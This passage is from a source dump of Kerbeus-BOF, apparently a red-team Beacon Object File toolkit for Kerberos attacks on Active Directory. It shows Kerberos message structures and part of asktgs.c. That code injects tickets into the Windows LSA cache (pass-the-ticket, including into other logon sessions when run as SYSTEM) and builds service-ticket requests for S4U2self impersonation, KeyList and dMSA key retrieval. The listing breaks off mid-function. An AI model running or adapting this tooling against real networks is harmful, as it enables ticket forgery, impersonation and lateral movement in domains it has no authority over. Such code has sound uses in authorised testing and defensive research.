		"KDC_ERR_INCONSISTENT_KEY_PURPOSE (0x4D) - The client certificate does not contain the KeyPurposeId EKU and is required",
		"KDC_ERR_DIGEST_IN_CERT_NOT_ACCEPTED (0x4E) - The signature algorithm used to sign the CA certificate is not accepted",
		"KDC_ERR_PA_CHECKSUM_MUST_BE_INCLUDED (0x4F) - The client did not include the required paChecksum parameter",
		"KDC_ERR_DIGEST_IN_SIGNED_DATA_NOT_ACCEPTED (0x50) - The signature algorithm used to sign the request is not accepted",
		"KDC_ERR_PUBLIC_KEY_ENCRYPTION_NOT_SUPPORTED (0x51) - The KDC does not support public key encryption for PKINIT",
		"KRB_AP_ERR_PRINCIPAL_UNKNOWN (0x52) - A well-known Kerberos principal name is used but not supported",
		"KRB_AP_ERR_REALM_UNKNOWN (0x53) - A well-known Kerberos realm name is used but not supported",
		"KRB_AP_ERR_PRINCIPAL_RESERVED (0x54) - A reserved Kerberos principal name is used but not supported",
		"KRB_UNKNOWN (0x55) - Code unknown",
		"KRB_UNKNOWN (0x56) - Code unknown",
		"KRB_UNKNOWN (0x57) - Code unknown",
		"KRB_UNKNOWN (0x58) - Code unknown",
		"KRB_UNKNOWN (0x59) - Code unknown",
		"KDC_ERR_PREAUTH_EXPIRED (0x5A) - The provided pre-auth data has expired",
		"KDC_ERR_MORE_PREAUTH_DATA_REQUIRED (0x5B) - The KDC found the presented pre-auth data incomplete and requires additional information",
		"KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET (0x5C) - The client sent an authentication set that the KDC was not expecting",
		"KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS (0x5D) - The provided FAST options that were marked as critical are unknown to the KDC and cannot be processed"
	};
	return KERBEROS_ERROR[errorCode];
}
*/

//////////////////////////////

typedef struct AsnElt {
	byte* objBuf;
	int objBufSize;
	int objOff;
	int objLen;
	int valOff;
	int valLen;
	int hasEncodedHeader;

	int tagClass;
	int tagValue;
	struct AsnElt* sub;
	int subCount;
} AsnElt;

typedef struct {
	bool isSet;
	int year;
	int month;
	int day;
	int hour;
	int minute;
	int second;
	int millisecond;
} DateTime;

typedef struct _ADKerbLocal {
	long  ad_type;
	int   ad_data_length;
	byte* ad_data;
	int   LocalData_length;
	byte* LocalData;
} ADKerbLocal;

typedef struct _ADRestrictionEntry {
	long  ad_type;
	int   ad_data_length;
	byte* ad_data;
	long  restriction_type;
	int   restriction_length;
	byte* restriction;
} ADRestrictionEntry;

typedef struct _ADIfRelevant {
	long  ad_type;
	int   ad_data_length;
	byte* ad_data;
	int   ADData_count;
	void** ADData;
} ADIfRelevant;

typedef struct _Checksum {
	int   cksumtype;
	int   checksum_length;
	byte* checksum;
}Checksum;

typedef struct _ETYPE_INFO2_ENTRY {
	int etype;
	char* salt;
} ETYPE_INFO2_ENTRY;

typedef struct _HostAddress {
	long  addr_type;
	char* addr_string;
} HostAddress;

typedef struct _EncryptedData {
	int   etype;
	uint  kvno;
	uint  cipher_size;
	byte* cipher;
} EncryptedData;

typedef struct _PrincipalName {
	long   name_type;
	uint   name_count;
	char** name_string;
} PrincipalName;

typedef struct _Ticket {
	int           tkt_vno;
	char*         realm;
	PrincipalName sname;
	EncryptedData enc_part;
} Ticket;

typedef struct _KDCReqBody {
	uint		  kdc_options;
	PrincipalName cname;
	PrincipalName sname;
	char*         realm;
	uint          till;		// DateTime
	uint          rtime;	// DateTime
	uint          nonce;
	uint		  addresses_count;
	HostAddress*  addresses;
	uint          additional_tickets_count;
	Ticket*       additional_tickets;
	uint          etypes_count;
	int*          etypes;
	EncryptedData enc_authorization_data;
} KDCReqBody;

typedef struct _S4UUserID {
	uint          nonce;
	PrincipalName cname;
	char*         crealm;
	int           options;
}S4UUserID;

typedef struct _KERB_PA_PAC_REQUEST {
	bool include_pac;
} KERB_PA_PAC_REQUEST;

typedef struct _PA_S4U_X509_USER {
	S4UUserID user_id;
	Checksum  cksum;
}PA_S4U_X509_USER;

typedef struct _PA_KEY_LIST_REQ {
	int Enctype;
} PA_KEY_LIST_REQ;

typedef struct _PA_FOR_USER {
	PrincipalName userName;
	char*		  userRealm;
	Checksum	  cksum;
	char*		  auth_package;
} PA_FOR_USER;

typedef struct _PA_PAC_OPTIONS {
	byte kerberosFlags[4];
} PA_PAC_OPTIONS;

typedef struct _PA_DATA {
	uint  type;
	void* value;
} PA_DATA;

typedef struct _LastReq {
	int      lr_type;
	DateTime lr_value;
} LastReq;

typedef struct _EncryptionKey {
	int   key_type;
	uint  key_size;
	byte* key_value;
} EncryptionKey;

typedef struct _DmsaKeyPackage {
	int           currentKeysCount;
	EncryptionKey* currentKeys;
	int           previousKeysCount;
	EncryptionKey* previousKeys;
	DateTime      expirationInterval;
	DateTime      fetchInterval;
} DmsaKeyPackage;

typedef struct _EncryptedPAData {
	int			  keytype;
	int           keysize;
	byte*         keyvalue;
	EncryptionKey encryptionKey;
	DmsaKeyPackage dmsaKeyPackage;
} EncryptedPAData;

typedef struct _EncKDCRepPart {
	EncryptionKey   key;
	LastReq	        lastReq;
	uint		    nonce;
	DateTime	    key_expiration;
	uint		    flags;
	DateTime	    authtime;
	DateTime	    starttime;
	DateTime	    endtime;
	DateTime	    renew_till;
	char*	        realm;
	PrincipalName   sname;
	EncryptedPAData encryptedPaData;
} EncKDCRepPart;

typedef struct _KrbCredInfo {
	EncryptionKey key;
	char*		   prealm;
	PrincipalName pname;
	uint		   flags;
	DateTime	   authtime;
	DateTime	   starttime;
	DateTime	   endtime;
	DateTime	   renew_till;
	char*		   srealm;
	PrincipalName sname;
} KrbCredInfo;

typedef struct _EncKrbCredPart {
	uint ticket_count;
	KrbCredInfo* ticket_info;
} EncKrbCredPart;

typedef struct _KRB_CRED {
	long			pvno;
	long			msg_type;
	uint			ticket_count;
	Ticket*			tickets;
	EncKrbCredPart enc_part;
} KRB_CRED;

typedef struct _Authenticator {
	long          authenticator_vno;
	char*         crealm;
	Checksum      cksum;
	PrincipalName cname;
	long          cusec;
	DateTime      ctime;
	EncryptionKey subkey;
	uint          seq_number;
} Authenticator;

typedef struct _AuthorizationData {
	int   ad_type;
	int   ad_data_length;
	byte* ad_data;
} AuthorizationData;

typedef struct _TransitedEncoding {
	int tr_type;
	int   contents_length;
	byte* contents;
} TransitedEncoding;

typedef struct _EncTicketPart {
	int				   flags;
	EncryptionKey	   key;
	char*			   crealm;
	PrincipalName	   cname;
	TransitedEncoding  transited;
	DateTime		   authtime;
	DateTime		   starttime;
	DateTime		   endtime;
	DateTime		   renew_till;
	HostAddress*	   caddr;
	AuthorizationData* authorization_data;
} EncTicketPart;

typedef struct _EncKrbPrivPart {
	uint  seq_number;
	char* new_password;
	char* host_name;
	char* username;
	char* realm;
} EncKrbPrivPart;

typedef struct _KRB_PRIV {
	long	       pvno;
	long	       msg_type;
	EncryptionKey  ekey;
	EncKrbPrivPart enc_part;
} KRB_PRIV;

/////////////////////////

typedef struct _AS_REQ {
	long	   pvno;
	long	   msg_type;
	uint	   pa_data_count;
	PA_DATA*   pa_data;
	KDCReqBody req_body;
} AS_REQ;

typedef struct _AS_REP {
	long          pvno;
	long          msg_type;
	int           pa_data_count;
	PA_DATA*      pa_data;
	char*         crealm;
	PrincipalName cname;
	Ticket		  ticket;
	EncryptedData enc_part;
} AS_REP;

typedef struct _AP_REQ {
	long          pvno;
	long          msg_type;
	uint          ap_options;
	Ticket		  ticket;
	Authenticator authenticator;
	EncryptionKey key;
	int           keyUsage;
} AP_REQ;

typedef struct _TGS_REP {
	long	      pvno;
	long	      msg_type;
	PA_DATA       padata;
	char*         crealm;
	PrincipalName cname;
	Ticket		  ticket;
	EncryptedData enc_part;
} TGS_REP;

//////////////////////////


================================================
FILE: AD-BOF/Kerbeus-BOF/asktgs/asktgs.c
================================================
#include "_include/asn_decode.c"
#include "_include/asn_encode.c"
#include "_include/crypt_b64.c"
#include "_include/crypt_checksum.c"
#include "_include/crypt_dec.c"
#include "_include/connection.c"

void DisplayTicket( KRB_CRED cred, int indentLevel ) {
    DateTime starttime = cred.enc_part.ticket_info[0].starttime;
    DateTime endtime = cred.enc_part.ticket_info[0].endtime;
    DateTime renew_till = cred.enc_part.ticket_info[0].renew_till;
    uint flags = cred.enc_part.ticket_info[0].flags;

    if (cred.enc_part.ticket_info[0].sname.name_count == 1)
        PRINT_OUT("  ServiceName              :  %s\n", cred.enc_part.ticket_info[0].sname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].sname.name_count > 1)
        PRINT_OUT("  ServiceName              :  %s/%s\n", cred.enc_part.ticket_info[0].sname.name_string[0], cred.enc_part.ticket_info[0].sname.name_string[1]);

    PRINT_OUT("  ServiceRealm             :  %s\n", cred.enc_part.ticket_info[0].srealm);

    if (cred.enc_part.ticket_info[0].pname.name_count == 1)
        PRINT_OUT("  UserName                 :  %s\n", cred.enc_part.ticket_info[0].pname.name_string[0]);
    else if (cred.enc_part.ticket_info[0].pname.name_count > 1)
        PRINT_OUT("  UserName                 :  %s@%s\n", cred.enc_part.ticket_info[0].pname.name_string[0], cred.enc_part.ticket_info[0].pname.name_string[1]);

    PRINT_OUT("  UserRealm                :  %s\n", cred.enc_part.ticket_info[0].prealm);
    PRINT_OUT("  StartTime (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", starttime.day, starttime.month, starttime.year, starttime.hour, starttime.minute, starttime.second);
    PRINT_OUT("  EndTime (UTC)            :  %02d.%02d.%04d %d:%d:%d\n", endtime.day, endtime.month, endtime.year, endtime.hour, endtime.minute, endtime.second);
    PRINT_OUT("  RenewTill (UTC)          :  %02d.%02d.%04d %d:%d:%d\n", renew_till.day, renew_till.month, renew_till.year, renew_till.hour, renew_till.minute, renew_till.second);

    PRINT_OUT("  Flags                    :  ");
    if (flags & reserved)		PRINT_OUT("reserved ");
    if (flags & forwardable)	PRINT_OUT("forwardable ");
    if (flags & forwarded)		PRINT_OUT("forwarded ");
    if (flags & proxiable)		PRINT_OUT("proxiable ");
    if (flags & proxy)			PRINT_OUT("proxy ");
    if (flags & may_postdate)	PRINT_OUT("may_postdate ");
    if (flags & postdated)		PRINT_OUT("postdated ");
    if (flags & invalid)		PRINT_OUT("invalid ");
    if (flags & renewable)		PRINT_OUT("renewable ");
    if (flags & initial)		PRINT_OUT("initial ");
    if (flags & pre_authent)	PRINT_OUT("pre_authent ");
    if (flags & hw_authent)		PRINT_OUT("hw_authent ");
    if (flags & ok_as_delegate) PRINT_OUT("ok_as_delegate ");
    if (flags & anonymous)		PRINT_OUT("anonymous ");
    if (flags & enc_pa_rep)		PRINT_OUT("enc_pa_rep ");
    if (flags & reserved1)		PRINT_OUT("reserved1 ");
    PRINT_OUT("\n");

    if (cred.enc_part.ticket_info[0].key.key_type == rc4_hmac)
        PRINT_OUT("  KeyType                  :  rc4_hmac\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes128_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes128_cts_hmac_sha1\n");
    else if (cred.enc_part.ticket_info[0].key.key_type == aes256_cts_hmac_sha1)
        PRINT_OUT("  KeyType                  :  aes256_cts_hmac_sha1\n");
}

void DescribeTicket(byte* ticket_b64) {
    int bytesSize = 0;
    byte* bytes = base64_decode(ticket_b64, &bytesSize);

    KRB_CRED kirbi = { 0 };
    AsnElt   asn_KRB_CRED = { 0 };
    if (BytesToAsnDecode3(bytes, bytesSize, false, &asn_KRB_CRED)) return;
    if (AsnGetKrbCred(&(asn_KRB_CRED.sub[0]), &kirbi)) return;
    DisplayTicket(kirbi, 2);
}



HANDLE GetCurrentToken(DWORD DesiredAccess) {
    HANDLE hCurrentToken = NULL;
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), DesiredAccess, FALSE, &hCurrentToken))
        if (hCurrentToken == NULL && KERNEL32$GetLastError() == ERROR_NO_TOKEN)
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), DesiredAccess, &hCurrentToken))
                return NULL;
    return hCurrentToken;
}

LUID GetCurrentLUID(HANDLE TokenHandle) {
    TOKEN_STATISTICS tokenStats;
    DWORD tokenSize;
    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenStatistics, &tokenStats, sizeof(tokenStats), &tokenSize))
        return (LUID) { 0 };
    return tokenStats.AuthenticationId;
}

BOOL IsSystem(HANDLE TokenHandle) {
    UCHAR bTokenUser[sizeof(TOKEN_USER) + 8 + 4 * SID_MAX_SUB_AUTHORITIES];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)bTokenUser;
    ULONG cbTokenUser;
    SID_IDENTIFIER_AUTHORITY siaNT = SECURITY_NT_AUTHORITY;
    PSID pSystemSid = NULL;
    BOOL bSystem = FALSE;

    // Try to open the token of the current thread first
    if (!ADVAPI32$OpenThreadToken(KERNEL32$GetCurrentThread(), TOKEN_QUERY, TRUE, &TokenHandle)) {
        // If there is no thread token, fall back to the process token
        if (KERNEL32$GetLastError() == ERROR_NO_TOKEN) {
            if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &TokenHandle)) {
                return FALSE;
            }
        } else {
            return FALSE;
        }
    }

    if (!ADVAPI32$GetTokenInformation(TokenHandle, TokenUser, pTokenUser, sizeof(bTokenUser), &cbTokenUser)) {
        return FALSE;
    }

    if (!ADVAPI32$AllocateAndInitializeSid(&siaNT, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid)) {
        return FALSE;
    }

    bSystem = ADVAPI32$EqualSid(pTokenUser->User.Sid, pSystemSid);

    ADVAPI32$FreeSid(pSystemSid);

    return bSystem;
}

BOOL GetLsaHandle(HANDLE hToken, BOOL highIntegrity, HANDLE* hLsa) {
    HANDLE hLsaLocal = NULL;
    ULONG  mode = 0;
    bool   status = TRUE;
    if (highIntegrity) {
        STRING lsaString = (STRING){ .Length = 8, .MaximumLength = 9, .Buffer = "Winlogon" };
        status = SECUR32$LsaRegisterLogonProcess(&lsaString, &hLsaLocal, &mode);
    }
    else {
        status = SECUR32$LsaConnectUntrusted(&hLsaLocal);
    }
    *hLsa = hLsaLocal;
    return status;
}

int my_isdigit(int c) {
    return (c >= '0' && c <= '9');
}

int my_islower(int c) {
    return (c >= 'a' && c <= 'z');
}

long int my_strtol(const char* str, char** endptr, int base) {
    long int result = 0;
    int sign = 1;

    if (*str == '-' || *str == '+') {
        sign = (*str == '-') ? -1 : 1;
        str++;
    }

    while (my_isdigit(*str) ||
           (base == 16 && (*str >= 'a' && *str <= 'f')) ||
           (base == 16 && (*str >= 'A' && *str <= 'F'))) {
        int digit = 0;
        if (my_isdigit(*str)) {
            digit = *str - '0';
        }
        else if (base == 16) {
            digit = (my_islower(*str) ? (*str - 'a' + 10) : (*str - 'A' + 10));
        }

        if (digit >= base)
            break;

        if (result > (LONG_MAX - digit) / base) {
            if (sign == 1)
                return LONG_MAX;
            else
                return LONG_MIN;
        }

        result = result * base + digit;
        str++;
    }

    if (endptr != NULL)
        *endptr = (char*)str;

    return result * sign;
}

void PTT(char* luid, byte* ticket) {
    HANDLE hToken = GetCurrentToken(TOKEN_QUERY);
    LUID   currentLuid = GetCurrentLUID(hToken);
    LUID   targetLuid = { 0 };
    bool   IsHighIntegrity = IsSystem(hToken);

    if (luid) {
        targetLuid.LowPart = my_strtol(luid, NULL, 16);
        if (targetLuid.LowPart == 0 || targetLuid.LowPart == LONG_MAX || targetLuid.LowPart == LONG_MIN) {
            PRINT_OUT("[x] Invalid luid\n");
            return;
        }
    }
    else {
        targetLuid = currentLuid;
    }

    if (!IsHighIntegrity && currentLuid.LowPart != targetLuid.LowPart) {
        PRINT_OUT("[X] You need to be in SYSTEM integrity.\n");
        return;
    }

    if (currentLuid.LowPart != targetLuid.LowPart)
        IsHighIntegrity = FALSE;

    HANDLE hLsa;
    if (GetLsaHandle(hToken, IsHighIntegrity, &hLsa)) return;

    ULONG authPackage;
    LSA_STRING krbAuth = { .Buffer = "kerberos",.Length = 8,.MaximumLength = 9 };
    if (SECUR32$LsaLookupAuthenticationPackage(hLsa, &krbAuth, &authPackage) == 0) {

        int decode_ticket_size = 0;
        byte* decode_ticket = base64_decode(ticket, &decode_ticket_size);

        int submitSize = sizeof(KERB_SUBMIT_TKT_REQUEST) + decode_ticket_size;
        KERB_SUBMIT_TKT_REQUEST* submitRequest = MemAlloc(submitSize);

        submitRequest->MessageType = KerbSubmitTicketMessage;
        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
            PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}



byte* ADRestrictionEntry_buildTokenStruct(uint flags, uint tokenIL) {
    byte* data = MemAlloc(40);

    data[0] = (byte)(flags >> 24);
    data[1] = (byte)(flags >> 16);
    data[2] = (byte)(flags >> 8);
    data[3] = (byte)(flags);
    data[4] = (byte)(tokenIL >> 24);
    data[5] = (byte)(tokenIL >> 16);
    data[6] = (byte)(tokenIL >> 8);
    data[7] = (byte)(tokenIL);
    ADVAPI32$SystemFunction036(data + 8, 32);
    return data;
}



BOOL New_PA_DATA_s4uX509user(EncryptionKey key, char* name, char* realm, uint nonce, int eType, BOOL dmsa, PA_DATA* pa_data) {

    PA_S4U_X509_USER* pa = MemAlloc(sizeof(PA_S4U_X509_USER));
    pa->user_id.nonce = nonce;
    // SIGN_REPLY = 0x20000000, UNCONDITIONAL_DELEGATION = 0x08000000
    pa->user_id.options = 0x20000000;
    if (dmsa)
        pa->user_id.options |= 0x08000000;
    if (my_copybuf(&(pa->user_id.crealm), realm, my_strlen(realm) + 1)) return TRUE;
    // DMSA Requests do not work with NT_ENTERPRISE, force NT_PRINCIPAL
    pa->user_id.cname.name_type = dmsa ? PRINCIPAL_NT_PRINCIPAL : PRINCIPAL_NT_ENTERPRISE;
    pa->user_id.cname.name_count = 1;
    pa->user_id.cname.name_string = MemAlloc(sizeof(void*) * pa->user_id.cname.name_count);
    if (my_copybuf(&(pa->user_id.cname.name_string[0]), name, my_strlen(name) + 1)) return TRUE;

    AsnElt userIDAsn = { 0 }, userIDSeq = { 0 };
    if (AsnS4UUserIDEncode(&(pa->user_id), &userIDAsn)) return TRUE;
    if (Make3(ASN_SEQUENCE, &userIDAsn, 1, &userIDSeq)) return TRUE;

    int userIDBytes_length = ValueLength(&userIDSeq);
    byte* userIDBytes = MemAlloc(userIDBytes_length);
    userIDBytes_length = EncodeValue(&userIDSeq, 0, userIDBytes_length, userIDBytes, 0);

    byte* cksumBytes = NULL;
    int cksumBytesLength = 0;

    if (eType == aes256_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES256, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == aes128_cts_hmac_sha1)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_HMAC_SHA1_96_AES128, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;
    if (eType == rc4_hmac)
        if (checksum(key.key_value, key.key_size, userIDBytes, userIDBytes_length, KERB_CHECKSUM_RSA_MD4, KRB_KEY_USAGE_PA_S4U_X509_USER, &cksumBytes, &cksumBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_SHA1_96_AES256;
    pa->cksum.checksum_length = cksumBytesLength;
    pa->cksum.checksum = cksumBytes;

    pa_data->type = PADATA_PA_S4U_X509_USER;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_s4u2self(EncryptionKey key, char* name, char* realm, PA_DATA* pa_data) {
    int realm_length = my_strlen(realm);
    int name_length = my_strlen(name);

    PA_FOR_USER* pa = MemAlloc(sizeof(PA_FOR_USER));

    pa->userName.name_count = 1;
    pa->userName.name_type = PRINCIPAL_NT_ENTERPRISE;
    pa->userName.name_string = MemAlloc(sizeof(void*) * pa->userName.name_count);
    if (!pa->userName.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }

    if (my_copybuf(&(pa->userName.name_string[0]), name, name_length + 1)) return TRUE;
    if (my_copybuf(&(pa->userRealm), realm, realm_length + 1)) return TRUE;
    if (my_copybuf(&(pa->auth_package), "Kerberos", 9)) return TRUE;

    byte nameTypeBytes[] = { 0,0,0,0 };
    nameTypeBytes[0] = 0xa;
    byte* finalBytes = MemAlloc(4 + name_length + realm_length + 8);
    MemCpy(finalBytes, nameTypeBytes, 4);
    MemCpy(finalBytes + 4, name, name_length);
    MemCpy(finalBytes + 4 + name_length, realm, realm_length);
    MemCpy(finalBytes + 4 + name_length + realm_length, pa->auth_package, 8);

    byte* outBytes = NULL;
    int outBytesLength = 0;
    if (checksum(key.key_value, key.key_size, finalBytes, 4 + name_length + realm_length + 8, KERB_CHECKSUM_HMAC_MD5, KRB_KEY_USAGE_KRB_NON_KERB_CKSUM_SALT, &outBytes, &outBytesLength)) return TRUE;

    pa->cksum.cksumtype = KERB_CHECKSUM_HMAC_MD5;
    pa->cksum.checksum_length = outBytesLength;
    pa->cksum.checksum = outBytes;

    pa_data->type = PADATA_S4U2SELF;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_KeyListReq(int eType, PA_DATA* pa_data) {
    PA_KEY_LIST_REQ* pa = MemAlloc(sizeof(PA_KEY_LIST_REQ));
    pa->Enctype = eType;

    pa_data->type = PADATA_KEY_LIST_REQ;
    pa_data->value = pa;
    return FALSE;
}

BOOL New_PA_DATA_options(BOOL claims, BOOL branch, BOOL fullDC, BOOL rbcd, PA_DATA* pa_data) {
    PA_PAC_OPTIONS* pac = MemAlloc(sizeof(PA_PAC_OPTIONS));
    if (claims) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 8);
    if (branch) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 4);
    if (fullDC) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 2);
    if (rbcd) pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] | 1);
    pac->kerberosFlags[0] = (byte)(pac->kerberosFlags[0] * 0x10);

    pa_data->type = PADATA_PA_PAC_OPTIONS;
    pa_data->value = pac;
    return FALSE;
}

BOOL New_PA_DATA(char* crealm, char* cname, Ticket providedTicket, EncryptionKey clientKey, BOOL opsec, byte* req_body, int req_body_length, PA_DATA* pa_data) {

    AP_REQ* ap_req = MemAlloc(sizeof(AP_REQ));
    if (!ap_req) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ap_req->pvno = 5;
    ap_req->msg_type = KERB_AP_REQ;
    ap_req->ap_options = 0;
    ap_req->ticket = providedTicket;
    ap_req->keyUsage = KRB_KEY_USAGE_TGS_REQ_PA_AUTHENTICATOR;
    ap_req->key = clientKey;

    DateTime dt = GetGmTimeAdd(0);

    if (my_copybuf(&(ap_req->authenticator.crealm), crealm, my_strlen(crealm) + 1)) return TRUE;

    ap_req->authenticator.authenticator_vno = 5;
    ap_req->authenticator.ctime = dt;
    ap_req->authenticator.cname.name_count = 1;
    ap_req->authenticator.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    ap_req->authenticator.cname.name_string = MemAlloc(sizeof(void*) * ap_req->authenticator.cname.name_count);
    if (!ap_req->authenticator.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(ap_req->authenticator.cname.name_string[0]), cname, my_strlen(cname) + 1)) return TRUE;

    if (opsec) {
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.seq_number), 4);
        PRINT_OUT("[+] Sequence number is: %u\n", ap_req->authenticator.seq_number);
        ADVAPI32$SystemFunction036(&(ap_req->authenticator.cusec), 4);
        ap_req->authenticator.cusec = ap_req->authenticator.cusec % 1000000;

        if (req_body) {
            ap_req->authenticator.cksum.cksumtype = KERB_CHECKSUM_RSA_MD5;
            ap_req->authenticator.cksum.checksum_length = req_body_length;
            ap_req->authenticator.cksum.checksum = req_body;
        }
    }

    pa_data->type = PADATA_AP_REQ;
    pa_data->value = ap_req;
    return FALSE;
}

BOOL NewTGS_REP(AsnElt asn_TGS_REP, TGS_REP* tgs_rep) {
    if (asn_TGS_REP.tagValue != KERB_TGS_REP) {
        PRINT_OUT("TGS-REP tag value should be 13");
        return TRUE;
    }
    if ((asn_TGS_REP.subCount != 1) || (asn_TGS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First TGS-REP sub should be a sequence");
        return TRUE;
    }

    // extract the KDC-REP out
    AsnElt* kdc_rep = asn_TGS_REP.sub[0].sub;
    for (int i = 0; i < asn_TGS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(tgs_rep->msg_type))) return TRUE;
        }
        if ( tagValue == 2 ) {
            if (AsnGetPaData(&(kdc_rep[i].sub[0]), &(tgs_rep->padata))) return TRUE;
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(tgs_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(tgs_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(tgs_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(tgs_rep->enc_part))) return TRUE;
        }
    }
    return FALSE;
}

BOOL NewTGS_REQ(char* userName, char* domain, char* sname, Ticket providedTicket, EncryptionKey clientKey, int requestEType, byte* tgs, BOOL opsec, BOOL u2u, BOOL unconstrained, char* targetDomain, char* s4uUser, BOOL keyList, BOOL renew, BOOL dmsa, BOOL enterprise, byte** reqBytes, int* reqBytesSize) {
    AS_REQ req = { 0 };

    req.pvno = 5;
    req.msg_type = 12;

    req.req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    req.req_body.till = 24 * 3600;		 // valid for 1h
    ADVAPI32$SystemFunction036(&(req.req_body.nonce), 4);

    if (!opsec && !u2u) {
        req.req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
        req.req_body.cname.name_count = 1;
        req.req_body.cname.name_string = MemAlloc(sizeof(void*) * req.req_body.cname.name_count);
        if (!req.req_body.cname.name_string) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        if (my_copybuf(&(req.req_body.cname.name_string[0]), userName, my_strlen(userName) + 1)) return TRUE;
    }

    int partsCount = 0;
    char** parts = my_strsplit( sname, '/', &partsCount );

    // Cross-domain logic: extract targetDomain from SPN if not specified
    if (targetDomain == NULL) {
        if (enterprise) {
            // For enterprise principal, extract domain from user@domain format
            int atIndex = my_strfind(sname, '@');
            if (atIndex > 0) {
                if (my_copybuf(&targetDomain, sname + atIndex + 1, my_strlen(sname) - atIndex)) return TRUE;
            } else {
                if (my_copybuf(&targetDomain, domain, my_strlen(domain) + 1)) return TRUE;
            }
        }
        else if ((partsCount > 1) && my_strcmp(parts[0], "krbtgt") && (tgs == NULL) && my_strcmp(parts[0], "kadmin")) {
            // Extract domain from SPN like cifs/server.sub.domain.com -> sub.domain.com
            int dotIndex = my_strfind(parts[1], '.');
            if (dotIndex > 0 && my_strfind(parts[1] + dotIndex + 1, '.') > 0) {
                // Has at least 2 dots, extract from first dot
                if (my_copybuf(&targetDomain, parts[1] + dotIndex + 1, my_strlen(parts[1]) - dotIndex)) return TRUE;
                // Remove port if present (e.g., domain.com:1234)
                int colonIndex = my_strfind(targetDomain, ':');
                if (colonIndex > 0)
                    targetDomain[colonIndex] = 0;
            }
        }
        if (targetDomain == NULL)
            if (my_copybuf(&targetDomain, domain, my_strlen(domain) + 1)) return TRUE;
    }

    if (my_copybuf(&req.req_body.realm, targetDomain, my_strlen(targetDomain) + 1)) return TRUE;
    StrToUpper(req.req_body.realm);

    req.req_body.etypes_count = 0;
    int etypeIndex = 0;
    if (s4uUser && opsec)
        req.req_body.etypes_count += 1;

    if (requestEType == subkey_keymaterial) {
        req.req_body.etypes_count += 4;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = aes128_cts_hmac_sha1;
        req.req_body.etypes[etypeIndex++] = rc4_hmac;
        req.req_body.etypes[etypeIndex++] = rc4_hmac_exp;
    }
    else if (opsec && (partsCount > 1) && my_strcmp(parts[0], "krbtgt")) {
        req.req_body.etypes_count += 5;
        req.req_body.etypes = MemAlloc(sizeof(int) * req.req_body.etypes_count);
        if (!req.req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        req.req_body.etypes[etypeIndex++] = aes256_cts_hmac_sha1;
